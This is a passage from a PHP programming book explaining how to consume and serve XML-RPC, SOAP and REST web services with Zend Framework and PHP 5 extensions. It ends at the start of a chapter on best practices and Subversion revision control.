    catch (Zend_XmlRpc_Client_FaultException $e)
    {
      echo $e->getMessage();
    }

We first instantiate the Zend_XmlRpc_Client object with the URL of the web service. The URL I’ve used above is relevant only to our testing environment, so be sure to change it to an appropriate alternative if you’re testing this script. The Zend_XmlRpc_Client then allows us to call the web service directly as if it were a PHP method, for example, $proxy->math->add.

It’s really that easy; the Zend_XmlRpc_Client and its namespace proxy make calling XML-RPC methods as simple as calling object methods.12 We pass native PHP values as method arguments, and get PHP values back. What could be easier?

12 http://framework.zend.com/manual/en/zend.xmlrpc.html

PHP’s Native XML-RPC Extension

If you don’t want to install Zend Framework, what other options do you have?

PHP has a native XML-RPC extension, ext/xmlrpc, that can either be compiled using the --with-xmlrpc directive, or installed via PECL. It’s marked as experimental, so using it in a production environment may be risky, though it has been available since the early PHP 4 series. It provides functions for encoding and decoding XML-RPC values, creating XML-RPC requests and responses, and binding an XML-RPC server to PHP callbacks.

A basic request uses the xmlrpc_encode_request function:

    $request = xmlrpc_encode_request($methodName, $valuesArray);

Here, $methodName is the XML-RPC method being requested, and $valuesArray is an array of values that are to be passed as arguments to the request. If you need to specify an XML encoding, you can pass an optional third value, an associative array, with some options:
  • 439.
    $request = xmlrpc_encode_request(
        $methodName,
        $valuesArray,
        array('encoding' => 'UTF-8')
    );

The returned $request is the XML that we can use to make the request.

Note that some XML-RPC types don’t have direct equivalents in PHP; to use these, you’ll need to tell ext/xmlrpc how they should be encoded using the xmlrpc_set_type function. This function takes its value by reference and marks the variable in place (its return value only indicates success), so call it on a variable rather than assigning its result. The marked values can then be passed directly to the xmlrpc_encode_request function:

    $date = '20061201T00:00:00';
    xmlrpc_set_type($date, 'datetime');
    $base64 = $base64EncodedData;
    xmlrpc_set_type($base64, 'base64');
    $request = xmlrpc_encode_request(
        $methodName,
        array($date, $base64, $assocArray),
        array('encoding' => 'UTF-8')
    );

As an example, here’s a simple XML-RPC client script that uses ext/xmlrpc and the XML-RPC server we saw in “How do I serve my own XML-RPC web services?”:

ext_xmlrpc_client.php (excerpt)

    try
    {
      $request = xmlrpc_encode_request(
          'math.add',
          array(array(1,2)),
          array('encoding' => 'UTF-8')
      );
      $context = stream_context_create(array('http' => array(
          'method' => "POST",
          'header' => "Content-Type: text/xml",
          'content' => $request
      )));
      $file = file_get_contents(
          'http://localhost/phpant2/chapter_12/examples/' .
          'zend_xmlrpc_serv.php', false, $context);
      if (false === $file)
      {
  • 440.
        throw new Exception('Unable to get response from web service');
      }
      $response = xmlrpc_decode($file);
      if (is_array($response) && xmlrpc_is_fault($response))
      {
        throw new Exception($response['faultString'],
            $response['faultCode']);
      }
      echo '1 + 2 = ' . $response;
    }
    catch (Exception $e)
    {
      echo $e->getMessage();
    }

PHP’s ext/xmlrpc extension does most of the work to abstract the basic XML-RPC functionality of encoding and decoding values, requests, and responses. However, you have to handle the actual data exchange yourself, as we did above with the file_get_contents function. This approach offers nothing near the simplicity of Zend_XmlRpc_Client unless, for example, you write your own class wrapper around it.

How do I serve my own XML-RPC web services?

XML-RPC servers listen at a specified address for HTTP POST requests, and return XML in the response content using the text/xml Content-Type header. Errors are reported using an XML-RPC fault response, which is an XML struct response that contains faultCode and faultString elements. Let’s see what’s involved in the process of decoding incoming requests, dispatching them, and returning a valid response.

Solution

The Zend_XmlRpc_Server class allows you to bind classes or functions to the server with optional namespaces;13 it then uses the Reflection API, and the developer-created phpDocumentor docblocks describing the functions or class methods,14 to determine the XML-RPC prototypes. The caveat to using this approach is that you must use XML-RPC types in your docblocks to describe your parameters and return values.

13 http://framework.zend.com/manual/en/zend.xmlrpc.html
14 http://www.phpdoc.org/

  • 441. Zend_XmlRpc_Server, like all server classes in the Zend Framework, follows PHP’s SoapServer API, which makes the interface consistent across the different protocol implementations.

As an example, here’s a simple Math class with two methods, add and multiply, for which we can build a server:

Math.class.php (excerpt)

    /**
     * Math methods
     */
    class Math
    {
      /**
       * Return the sum of all values in an array
       *
       * @param array $values An array of values to sum
       * @return int
       */
      public static function add($values)
      {
        return array_sum($values);
      }
      /**
       * Return the product of all values in an array
       *
       * @param array $values An array of values to multiply
       * @return int
       */
      public static function multiply($values)
      {
        return array_product($values);
      }
    }
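To give a feel for how a server could turn docblocks into XML-RPC prototypes, here is a rough sketch built on ReflectionMethod. It is not how Zend_XmlRpc_Server is implemented; describeMethod is a hypothetical helper, and the regular expressions only cope with simple @param and @return tags.

```php
<?php
/**
 * Math methods (a trimmed copy of the class above, so the sketch runs alone)
 */
class Math
{
    /**
     * Return the sum of all values in an array
     *
     * @param array $values An array of values to sum
     * @return int
     */
    public static function add($values)
    {
        return array_sum($values);
    }
}

/**
 * Hypothetical helper: derive "returnType namespace.method(paramTypes)"
 * from a method's docblock.
 */
function describeMethod($class, $method, $namespace)
{
    $reflection = new ReflectionMethod($class, $method);
    $doc = (string) $reflection->getDocComment();

    // Capture the type that follows each @param tag, and the @return type.
    preg_match_all('/@param\s+(\S+)/', $doc, $params);
    preg_match('/@return\s+(\S+)/', $doc, $return);

    $returnType = isset($return[1]) ? $return[1] : 'void';
    return $returnType . ' ' . $namespace . '.' . $method
        . '(' . implode(', ', $params[1]) . ')';
}

$prototype = describeMethod('Math', 'add', 'math');
echo $prototype, "\n";
// prints: int math.add(array)
```

This relies on PHP keeping docblocks available at run time, which is the default; a missing or incomplete docblock would yield an incomplete prototype, which is why the tags matter to a docblock-driven server.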
  • 442. Now, let’s build the XML-RPC server, and for good measure, let’s also create a function for retrieving XML-RPC server information:

zend_xmlrpc_serv.php (excerpt)

    require_once 'Zend/XmlRpc/Server.php';
    require_once 'Math.class.php';
    /**
     * Get some info from the server
     *
     * @return struct
     */
    function getInfo()
    {
      return array(
        'publisher' => 'SitePoint',
        'title' => 'The PHP Anthology'
      );
    }
    $server = new Zend_XmlRpc_Server();
    // Math class methods will be available in the 'math' namespace
    $server->setClass('Math', 'math');
    // getInfo() function will be available as server.getInfo
    $server->addFunction('getInfo', 'server');
    // Handle a request
    echo $server->handle();

The Zend_XmlRpc_Server instance in this example will make three methods available, math.add, math.multiply, and server.getInfo, in addition to several system methods that we can use to obtain information about the server. It will automatically check incoming requests to make sure they adhere to the various method signatures, throwing fault responses if they do not, and return the XML-RPC response along with any required headers.

You don’t need to change your code to conform to the server class requirements; the server conforms to your code. You will need to write phpDocumentor docblocks for each method or function you’ll be serving, and ensure they contain @param and @return tags; the server uses these to create the method signatures, and compares the types and numbers of incoming parameters with those signatures to ensure the incoming request conforms to the definition. Additionally, the types specified with these tags should conform to XML-RPC type definitions; for example, use struct for associative arrays, dateTime.iso8601 for dates, and so on.

  • 443. PHP’s Native XML-RPC Extension

Serving XML-RPC with Zend_XmlRpc_Server is as easy as serving SOAP requests in PHP 5; simply register a class or function with the server, and handle it. But besides Zend_XmlRpc_Server, what options do we have?

ext/xmlrpc can be used to build XML-RPC servers, too. We simply create an XML-RPC server using xmlrpc_server_create, register callbacks to XML-RPC method names, grab the request, handle it, and send the response back.

As an example, let’s try to serve the following method and function:

ext_xmlrpc_serv.php (excerpt)

    /**
     * Math methods
     */
    class Math
    {
      /**
       * Return the sum of all values in an array
       *
       * @param string $method The XML-RPC method name called
       * @param array $params Array of parameters from the request;
       *                      the first is the array of values to sum
       * @return int
       */
      public static function add($method, $params)
      {
        return array_sum($params[0]);
      }
    }
    /**
     * Return the product of some values
     *
     * @param string $method The XML-RPC method name called
     * @param array $params Array of parameters from the request
     * @return int
     */
    function product($method, $params)
    {
      return array_product($params);
    }
  • 444. 420 The PHP Anthology Now that we’ve created these definitions, we’ll register them with the XML-RPC server: ext_xmlrpc_serv.php (excerpt) $server = xmlrpc_server_create(); xmlrpc_server_register_method($server, 'math.add', array('Math', 'add')); xmlrpc_server_register_method($server, 'product', 'product'); Now we need to grab the request, dispatch it, and return a response: ext_xmlrpc_serv.php (excerpt) $request = file_get_contents('php://input'); $response = xmlrpc_server_call_method($server, $request, null); header('Content-Type: text/xml'); echo $response; If you examine this example closely, you’ll notice that functions and method calls have to follow a particular signature; specifically, they must accept the requested $method and the requested $params, in that order, rather than the individual parameter values. This means that if you want to create an XML-RPC server using ext/xmlrpc, you must either write all your method handlers to conform to this specification, write wrappers for your existing methods, or write a dispatcher to dispatch method calls using the original parameter order; all of these activities are beyond the scope of this discussion. The easier approach is to use an XML-RPC server that performs this magic for you. PEAR’s XML_RPC2 and Zend_XmlRpc are two such implementations. Zend_XmlRpc makes XML-RPC a first-class OOP citizen, simplifying the process of making requests and serving responses, and allowing any function or class method to be used as a server handler. How can I consume SOAP web services? SOAP, originally an acronym for Simple Object Access Protocol, but now simply a protocol name, is, to quote the specification, “a lightweight protocol intended for exchanging structured information in a decentralized, distributed environment.” SOAP provides tremendous flexibility and extensibility.
  • 445. XML and Web Services 421 Like the other protocols discussed in this section, SOAP uses XML to transfer messages between the client and server. The base message unit that’s transferred is an object. A server needs to specify the available methods and properties, and make that specification available to clients so that they can initiate requests. This specification is written in WSDL, the Web Services Description Language. The SOAP and WSDL specifications are notoriously difficult to decipher. The general consensus among developers is to use WSDL development tools to create the WSDL from your application classes, and to use clients and servers provided in your language to conduct the actual SOAP communication. Fortunately, PHP 5 has native SoapClient and SoapServer classes, and tools are emerging for generating the WSDL. The topic of consuming SOAP-based web services is incredibly broad and we couldn’t possibly cover it in any great detail in this book, but here’s a gentle introduction. Solution Using the PHP 5 SoapClient class is incredibly easy: $client = new SoapClient($uriToWsdl, array('location' => $uriToSoapService)); $result = $client->SomeMethod($value1, $value2); There’s certainly much more to the SoapClient class, but that’s the basic usage: create a SoapClient instance by passing the URL to the WSDL specification, and the location of the SOAP service, as arguments to the SoapClient constructor, and start making calls. The SoapClient makes all the methods of the SOAP service available as PHP methods. What if you want to pull the results of a SOAP request into an object? No problem! You can easily map a SOAP response to a PHP class. Here’s a hypothetical example that uses a book information service. The SOAP service provides a GetBookInfo method. If we pass it an $id value, it will return a response representing a book with author, title, date, and publisher properties. 
This response is defined in the web service’s WSDL file as the type Book. And if we already have an object for
  • 446. 422 The PHP Anthology a book in our PHP application (let’s call it MyBook), we can map the SOAP response type onto our own MyBook object. First, we define our MyBook class: class MyBook { public $author; public $title; public $date; public $publisher; } When we instantiate the SoapClient object, we add a classmap option that maps the WSDL Book type to our MyBook PHP class: $client = new SoapClient($uriToWsdl, array( 'location' => $uriToSoapService, 'classmap' => array('Book' => 'MyBook') )); Now, when we call the SOAP method that would normally return the SOAP object type, we receive an instance of our PHP class instead: $book = $client->GetBookInfo($id); // $book is a MyBook instance echo $book->title; When it binds a class to a SOAP response, SoapClient will set in the object any public properties for which it finds a match in the response. Because the returned object instance is a standard PHP object, you can also define methods for accessing or transforming the SOAP data in the class. Discussion Assuming that the remote service has a defined WSDL specification, making requests to SOAP services is tremendously easy in PHP 5. The flexibility to bind objects to responses can offer tremendous opportunities for working with remote data. If you’ve been afraid of SOAP before, yet you’re comfortable with OOP, there’s no need to be afraid any longer!
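The closing remark about defining methods on the mapped class can be illustrated with a small sketch. It assumes nothing about any real service: the getCitation method and the sample values are hypothetical, and the properties are filled in by hand to stand in for what SoapClient would populate from a response when the classmap option is used.

```php
<?php
// Hypothetical variant of MyBook with a helper method added.
class MyBook
{
    public $author;
    public $title;
    public $date;
    public $publisher;

    // Hypothetical helper: format the mapped data as a one-line citation.
    public function getCitation()
    {
        return sprintf(
            '%s, "%s" (%s, %s)',
            $this->author,
            $this->title,
            $this->publisher,
            $this->date
        );
    }
}

// Stand-in for $book = $client->GetBookInfo($id); the values are invented
// and set by hand so the sketch runs without a SOAP service.
$book = new MyBook();
$book->author    = 'Example Author';
$book->title     = 'PHP Anthology';
$book->date      = 2007;
$book->publisher = 'SitePoint';

echo $book->getCitation(), "\n";
```

Because the helper lives in the class rather than in calling code, every script that receives a MyBook instance from the client can reuse the same formatting.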
  • 447. XML and Web Services 423 How do I serve SOAP web services? You’ve dipped your toes in the SOAPy water by consuming some SOAP services in “How can I consume SOAP web services?”, and now you’re thinking that the next step is to create some of your own. You’ve got a number of classes that seem eligible; how can you expose their APIs publicly? Solution Serving SOAP is roughly as easy as using the client: use SoapServer. The topic of creating SOAP-based web services is another broad area that we couldn’t possibly cover in any great detail in this book, but let’s get our bearings by looking at a simple example. First, let’s define a class for a book with the original name of Book: class Book { public $author; public $title; public $date; public $publisher; /** * Constructor * * @param string $author * @param string $title * @param int $date * @param string $publisher * @return void */ public function __construct($author, $title, $date, $publisher) { $this->author = $author; $this->title = $title; $this->date = $date; $this->publisher = $publisher; } } With that out of the way, we can define an API for retrieving books with a class called BookService:
  • 448. 424 The PHP Anthology class BookService { /** * Retrieve book information and send * * @param int $id * @return Book */ public function GetBookInfo($id) { ⋮ perform some work and get some book details… $book = new Book($author, $title, $date, $publisher); return $book; } } Now let’s bind these classes to a SoapServer instance: $server = new SoapServer($uriToWsdl, array( 'encoding' => 'ISO-8859-1', 'actor' => $uriToSoapService, 'classmap' => array('Book' => 'Book') )); $server->setClass('BookService'); $server->handle(); That’s all there is to it; your BookService class’s GetBookInfo method is now exposed as a SOAP method, and will return Book instances to requests from SOAP clients. Discussion Serving SOAP has never been so easy as it is with PHP 5. But there’s one more aspect to consider: what about the WSDL specification? It’s possible to use SOAP between PHP servers without using WSDL, but this approach is problematic, because it means that many of the features of the SOAP client, such as the auto-discovery of available methods, won’t work. It then becomes the responsibility of the service developer to communicate the available methods to those consuming the services. Although generating your own WSDL may be a daunting task, given the complexity of the specification, many IDEs have tools for generating WSDL specifications based on the introspection of your classes. Another
  • 449. XML and Web Services 425 choice for generating WSDL specifications, and a newcomer on the scene, is Zend_Soap, from the Zend Framework.15 This component contains the Zend_Soap_AutoDiscover class, which will generate a WSDL specification from a class using PHP’s own Reflection API. Here’s an example: $generator = new Zend_Soap_AutoDiscover('BookService'); $wsdl = $generator->handle(); From here, you can cache the generated WSDL specification, contained in the $wsdl variable, in a web-accessible location, then start to create servers and clients for it using SoapServer and SoapClient. How can I consume REST services? REST, or Representational State Transfer, is a newcomer on the web services scene, and has gained considerable popularity in the past few years. The ideas behind this architectural approach are simple: application state and functionality are separated into resources that can be addressed with a unique identifier, all resources share a consistent interface and standardized content types. As it happens, the Web is a great example of this style of application architecture. We can use the URL as the unique identifier for resources and the HTTP protocol as the consistent interface through which we access the resources. Finally, resources are represented by standardized content types—XML, HTML, and so on.16 As an example, let’s consider a hypothetical REST service for books: ■ A GET request to http://example.com/books uses XML to return a list of books. ■ A POST request that contains XML book data and is made to the same URL will add a new book to the service. ■ Retrieving the XML for an individual book involves making an HTTP GET request to a slightly different URL that specifies a particular resource, such as http://example.com/books/php-anthology. 
15 http://framework.zend.com/manual/en/zend.soap.html 16 A more detailed explanation can be found on Wikipedia, at http://en.wikipedia.org/wiki/Representational_State_Transfer.
  • 450. 426 The PHP Anthology ■ Editing the book involves sending XML book data via an HTTP PUT request to the same URL. ■ Sending an HTTP DELETE request to the URL would delete the resource. Such a service would be considered RESTful, that is, it would follow the principles of REST. Each resource has a unique identifier, its URL, and each resource has a consistent interface, HTTP, through which the request type describes the type of action being requested. Basically, REST makes use of the technology of the Web, unlike XML-RPC or SOAP, which use the Web simply as a means for sending commands. For example, in our REST API above, sending a GET request to http://example.com/books/php-anthology returns the XML representation of the book. If the book doesn’t exist, the service responds with a standard HTTP 404 Not Found response. In contrast, using an XML-RPC interface to the same service might require you to open a connection to the service and make a method call to a getBook method, passing the book’s identifying code, php-anthology, as an argument. If the book didn’t exist, the service would respond with an error message. The main difference between these two approaches is the use of HTTP to represent the intended action (GETting a book) and the meaningful URL that represents the book itself. In real-world circumstances, many browsers and HTTP clients still don’t implement PUT and DELETE, so all resource update and delete operations are completed via POST requests that use additional request parameters to represent the operation desired. While not entirely RESTful, the practice is widespread enough to be considered the standard approach. Modern REST services that use XML are common. Some REST services provide XML schemas so that consumers can easily determine how to get at the data they need or format their requests, while others simply provide API documentation. 
Solution By now, you should be well on your way to being able to handle any XML that’s thrown at you. We can use SimpleXML to parse REST responses, and SimpleXML, DOM, or XMLWriter to create requests (if a data payload is needed).
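Since XMLWriter is named here as one option for creating request payloads, a minimal sketch of that route may help. The buildBookPayload function is hypothetical, and the title and publisher element names are assumptions about what a book service might expect; only the XMLWriter calls themselves are standard PHP.

```php
<?php
// Hypothetical helper: build a <book> request payload with XMLWriter.
function buildBookPayload($title, $publisher)
{
    $writer = new XMLWriter();
    $writer->openMemory();                    // write into an in-memory buffer
    $writer->startDocument('1.0', 'UTF-8');   // emits the XML declaration
    $writer->startElement('book');
    $writer->writeElement('title', $title);   // text content is escaped for us
    $writer->writeElement('publisher', $publisher);
    $writer->endElement();                    // closes <book>
    $writer->endDocument();

    return $writer->outputMemory();           // returns the buffered XML string
}

$xml = buildBookPayload('Life, the Universe & Everything', 'Del Rey');
echo $xml;
```

XMLWriter streams the document out element by element, so it suits payloads that are assembled once and sent; when a document needs to be inspected or modified after it is built, SimpleXML or DOM is usually the more convenient choice.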
  • 451. XML and Web Services 427 To use a specific REST service, you’ll need to obtain its API documentation, but for the purposes of this example, let’s use the hypothetical REST service for books we defined above. Let’s assume that the URL http://example.com/books, when called via an HTTP GET request, returns the following XML list of books: <?xml version="1.0" encoding="UTF-8"?> <books> <book id="php-anthology">PHP Anthology</book> <book id="css-anthology">CSS Anthology</book> </books> In our book service, the id attribute of each book can be used to retrieve the book’s details. Here’s an example of the XML returned by a GET request to http://example.com/books/php-anthology: <?xml version="1.0" encoding="UTF-8"?> <book> <id>php-anthology</id> <title>PHP Anthology</title> <publisher>SitePoint Pty., Ltd.</publisher> <chapterCount>14</chapterCount> <edition>2</edition> <pubDate>2007</pubDate> </book> To retrieve and process this information, we might use a hypothetical client script that uses SimpleXML, like this: $books = new SimpleXMLElement('http://example.com/books', null, true); $ids = array(); foreach ($books as $book) { $ids[] = $book['id']; } foreach ($ids as $id) { $book = new SimpleXMLElement( 'http://example.com/books/' . $id, null, true
  • 452. 428 The PHP Anthology ); echo $book->title, ', published by: ', $book->publisher, "\n"; } For XML-based REST services, we can employ SimpleXML to do the heavy lifting of making the request, receiving the response, and parsing it. In the example above, we retrieve the books list by instantiating a new SimpleXMLElement object, passing the URL as the first argument. If the first argument to the constructor is a URL, the third argument must be true. We grab the id attribute values of all books, and use them to make new requests to obtain the XML data for each book. We then grab each book’s title and publisher in order to display the list. How would you create a new book using this service? Most services would have you POST a book definition to the base URL, and in our example, that approach might look like this: $book = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8"?><book></book>'); $book->addChild('title', 'Life, the Universe, and Everything'); $book->addChild('publisher', 'Del Rey'); $book->addChild('chapterCount', 42); $book->addChild('edition', '26 April 2005'); $book->addChild('pubDate', '2005'); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $book->asXML() )); $context = stream_context_create($opts); $response = file_get_contents('http://example.com/books', false, $context); The task of editing a particular resource would be similar to that of adding a new document. However, the URL we’ll use will be the resource’s unique URL, and instead of sending the entire book definition, we’ll need to send only the data that’s changing: $book = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8"?><book></book>'); $book->addChild('chapterCount', 21);
  • 453. XML and Web Services 429 $book->addChild('edition', 'Del Rey 2005'); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $book->asXML() )); $context = stream_context_create($opts); $response = file_get_contents( 'http://example.com/books/php-anthology', false, $context); Maybe we want to delete the book from the list; how would we accomplish this? So far, we’ve distinguished between adding and updating resources by changing the URL. A proper RESTful web service would have us send an HTTP DELETE request to the book’s unique URL, but since not all HTTP clients can generate DELETE requests, our web service does the next best thing: it requires users to POST a delete element with a value of 1: $book = new SimpleXMLElement( '<?xml version="1.0" encoding="UTF-8"?><book></book>'); $book->addChild('delete', 1); $opts = array('http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $book->asXML() )); $context = stream_context_create($opts); $response = file_get_contents( 'http://example.com/books/php-anthology', false, $context); The example above is a bit contrived, but it’s not far off the mark. A client makes simple HTTP GET requests to resources, and decides what to do with the responses, or POSTs XML to the service in order to add, update, or delete resources. SimpleXML is the staple resource for consuming and generating requests, and PHP’s own streams layer makes POSTing requests a breeze. In a real REST service, you’ll need to examine the API carefully to determine which URLs are available, what XML they return, and what XML they expect for operations that affect data in the service. REST is loosely defined, so each time you want to interact directly with a new REST service, you’ll need to do a bit of learning.
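The three POST examples above repeat the same stream-context setup, so one possible refinement is to move it into a helper. The sketch below is only that: buildXmlPostOptions is a hypothetical function, and the text/xml content type is an assumption about what the hypothetical book service accepts, not something the service definition states.

```php
<?php
// Hypothetical helper: build stream-context options for POSTing an XML body.
function buildXmlPostOptions(SimpleXMLElement $payload)
{
    return array('http' => array(
        'method'  => 'POST',
        // Assumption: the service accepts text/xml for XML request bodies.
        'header'  => 'Content-Type: text/xml',
        'content' => $payload->asXML(),
    ));
}

// Build the "delete" payload used in the last example above.
$book = new SimpleXMLElement(
    '<?xml version="1.0" encoding="UTF-8"?><book></book>');
$book->addChild('delete', '1');

$opts = buildXmlPostOptions($book);

// To send the request, pass the options to the streams layer:
// $context  = stream_context_create($opts);
// $response = file_get_contents($url, false, $context);
echo $opts['http']['content'];
```

Keeping the options in one place means a change to the headers or method only has to be made once, and the payload can be inspected before anything is sent over the network.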
  • 454. 430 The PHP Anthology Using the Zend Framework Another possible approach to consuming a REST service is to use Zend Framework’s Zend_Rest_Client component.17 This client expects that the REST server it contacts is using XML for the transaction, which should be a safe assumption. After performing the request, we access the response using object properties, which eliminates the need to perform type casting as we must with SimpleXML. Technorati’s bloginfo API requires you to make a GET request to the following URL:18 http://api.technorati.com/bloginfo?key=apikey&url=blog url The URL requires two arguments to appear in the query string: your API key and the blog’s URL. You can get your own API key from the Technorati web site at http://technorati.com/developers/apikey.html. The above URL will return the following XML: <?xml version="1.0" encoding="utf-8"?> <!-- generator="Technorati API version 1.0 /bloginfo" --> <!DOCTYPE tapi PUBLIC "-//Technorati, Inc.//DTD TAPI 0.02//EN" "http://api.technorati.com/dtd/tapi-002.xml"> <tapi version="1.0"> <document> <result> <url>URL</url> <weblog> <name>blog name</name> <url>blog URL</url> <rssurl>blog RSS URL</rssurl> <atomurl>blog Atom URL</atomurl> <inboundblogs>inbound blogs</inboundblogs> <inboundlinks>inbound links</inboundlinks> <lastupdate>date blog last updated</lastupdate> <rank>blog ranking</rank> <lang></lang> <foafurl>blog foaf URL</foafurl> </weblog> 17 http://framework.zend.com/manual/en/zend.rest.html 18 http://technorati.com/developers/api/bloginfo.html
  • 455. XML and Web Services 431 <inboundblogs>inbound blogs</inboundblogs> <inboundlinks>inbound links</inboundlinks> </result> </document> </tapi> As an example, you could use the following approach to use Technorati’s bloginfo service: zend_rest_technorati.php (excerpt) require_once 'Zend/Rest/Client.php'; $key = 'apikey'; // Technorati requires an API key; replace this placeholder with your own $technorati = new Zend_Rest_Client( 'http://api.technorati.com/bloginfo'); $technorati->key($key); $technorati->url('http://sitepoint.com'); $result = $technorati->get(); echo $result->weblog->name . ' (rank: '. $result->weblog->rank . ')'; This code would output: SitePoint : New Articles, Fresh Thinking for Web Developers and Designers (rank: 196) How can I serve REST services? You’re jumping on the REST bandwagon. Your boss is convinced that this is the big new trend in web services, and wants something out the door today. What do you need to do? Solution Honestly, all you need to do is: ■ Create URLs or a URL schema that can map to your resources. ■ Create XML for your responses. You need to determine which resources you’ll make available, and then come up with a URL schema to cover them. In this example, let’s use books as the resource
  • 456. 432 The PHP Anthology we want to make available. Perhaps you need services that allow you to list the book resources, detail a single book at a time, and allow users to post information about new books and edit that for existing books. A RESTful URL schema might look like this: ■ retrieve list of books: http://example.com/books ■ retrieve single book: http://example.com/books/book-name To add a book, you would POST to the first URL; to update the details of an existing book, you would POST to the second. Next, you need to create a script to handle the incoming requests. Make sure you have a look at “How do I make “pretty” URLs in PHP?” in Chapter 5; there, you’ll find a complete solution for creating a URL schema with the Apache web server and a request handling class. Here’s a simple example script to handle our book requests: $path = explode('/', trim($_SERVER['PATH_INFO'], '/')); if ((1 == count($path)) && ('books' == $path[0])) { if ('post' == strtolower($_SERVER['REQUEST_METHOD'])) { ⋮ new book entry } else { ⋮ list books } } elseif ((2 == count($path)) && ('books' == $path[0])) { if ('post' == strtolower($_SERVER['REQUEST_METHOD'])) { ⋮ edit book entry } else { ⋮ retrieve book entry } } This script starts by trimming the leading and trailing / characters from the path information of the incoming request and exploding the result into an array. It then tests how many elements are
  • 457. XML and Web Services 433 generated, and whether the first element is books. If only one element is present, books, the script checks the request method. If it’s a POST request, the code takes the branch to creating a new book; if it’s a GET request, the code takes the branch to listing all the books. If two elements are present, the script assumes that the second element is the book name. In this case, a POST request represents an update to the specific book and a GET request will display the named book. For the book list and named-book information requests, simply generate or fetch the XML to return to the user. In the case of new entries or updated entries, you’ll need to retrieve and parse the incoming XML first. To retrieve the incoming XML, grab it from the raw POST request like this: $xml = file_get_contents('php://input'); Once you have the XML, you can parse and act on it as necessary. Discussion REST services allow us either to create the XML ahead of time, or to generate it on the fly using PHP as I’ve described elsewhere in this chapter. I highly recommend that you cache the responses, unless the request is allowed to change the data; one easy way to scale REST is by caching the service as static XML, because static content is usually served much faster than dynamic content by modern web servers. While REST services scale well and are relatively easy to implement, they do make the job more difficult for developers who want to use your services, since developers need to learn a new XML schema for every new REST service they consume. However, the simplicity of dealing with XML in PHP 5 makes this a moot point in most regards, and the combination of REST and SimpleXML makes for some very powerful web services, both on the client and server ends. Summary In this chapter, we’ve taken a quick tour of PHP 5’s various XML and web service extensions. We discussed the tasks of parsing and generating XML and using RSS
  • 458. 434 The PHP Anthology feeds, concluding that SimpleXML is PHP 5’s Swiss Army Knife for XML manipulation, but also noting other important extensions such as SAX, XMLReader, XMLWriter, and DOM (on which SimpleXML is based). Searching XML via XPath, using both DOM and SimpleXML, was demonstrated, and the basic XPath syntax was covered. Most modern web services use XML for their payloads. XML-RPC uses XML for type hinting values passed in a request and returned in a response; with modern XML-RPC libraries such as Zend_XmlRpc, XML-RPC services can be called as PHP object methods transparently. SOAP defines an object as the unit of transport, and PHP 5’s SoapServer and SoapClient classes make creating and consuming SOAP services trivial. Finally, we discussed REST and RESTful web services, using SimpleXML to generate and consume REST resources.
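As a closing illustration of the REST serving approach from “How can I serve REST services?”, the routing decisions can be pulled into a function so that they can be exercised without a web server. This is a sketch under stated assumptions: routeBookRequest and the action names it returns are hypothetical, and the function simply mirrors the count-and-compare logic of the script shown in that solution, adding a fallback for unknown paths.

```php
<?php
// Hypothetical router: maps a request method and PATH_INFO to an action name.
function routeBookRequest($method, $pathInfo)
{
    // Strip leading and trailing slashes, then split into path segments.
    $path   = explode('/', trim($pathInfo, '/'));
    $isPost = ('post' == strtolower($method));

    // Anything outside /books or /books/<name> is not part of the service.
    if (('books' != $path[0]) || (count($path) > 2)) {
        return 'not-found';
    }

    if (1 == count($path)) {
        // /books: POST adds a book, any other method lists the books.
        return $isPost ? 'create-book' : 'list-books';
    }

    // /books/<name>: POST updates the book, any other method retrieves it.
    return $isPost ? 'update-book' : 'retrieve-book';
}

echo routeBookRequest('GET', '/books/php-anthology'), "\n";
```

In a live script the function would be called with $_SERVER['REQUEST_METHOD'] and $_SERVER['PATH_INFO'], and the returned action name would select the code that generates or parses the XML.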
  • 459. Chapter 13 Best Practices The fact that PHP has an incredibly low barrier to entry represents both its greatest strength and greatest weakness. To its merit, PHP allows the novice programmer to develop feature-rich applications without needing to learn even the rudiments of computer science. The downside, however, is that as PHP offers many ways to complete the same task, application code can quickly become unmaintainable. Many programmers in the PHP field are now recognizing the need to standardize and promote best practices. Some of these best practices are PHP specific, such as the usage of tools like phpDocumentor for consistent documentation,1 or testing suites such as SimpleTest2 and PHPUnit.3 Other practices that are being promoted in the PHP community are more generic: the use of revision control systems and code deployment practices, for example. Regardless, if you follow all of them, these practices will make your life, and the lives of those who may later maintain your code, much easier. 1 http://www.phpdoc.org/ 2 http://simpletest.org/ 3 http://www.phpunit.de/
  • 460. 436 The PHP Anthology How do I track revisions to my project’s code? Picture this sad scene: your site is on the verge of being launched, and you’ve introduced some new code to the system at the eleventh hour only to find, to your chagrin, that other features are now broken. You now have less than an hour to fix the problem. You need to undo your changes. But how on earth do you do that? We can only hope you’re using some form of revision control software (RCS).4 Revision control software allows users to track changes to documents, code, and other files, and offers features to allow the merging of changes from multiple users, and the management of different versions of your code. Think of RCS as both a backup repository for your code, and a record of all the changes it undergoes for the duration of a project. Solution My preferred RCS is Subversion, and this software will be used in all the examples throughout this chapter.5 So you need to undo your changes fast? If you haven’t already committed your changes, you can roll them back easily with the following command, which discards the local modifications to the file: $ svn revert filename If you’ve already committed your changes, the following command will return your working copy of the file to the previous revision: $ svn up -r PREV filename Note that this second command changes only your working copy; the committed revision remains in the repository’s history. 4 See the Wikipedia Version Control entry for a summary of revision control and a comparison of revision control systems: http://en.wikipedia.org/wiki/Version_control. 5 Visit the Subversion project web site at http://subversion.tigris.org/ for complete documentation. O’Reilly Media has published its book, Version Control with Subversion, online at http://svnbook.red-bean.com/
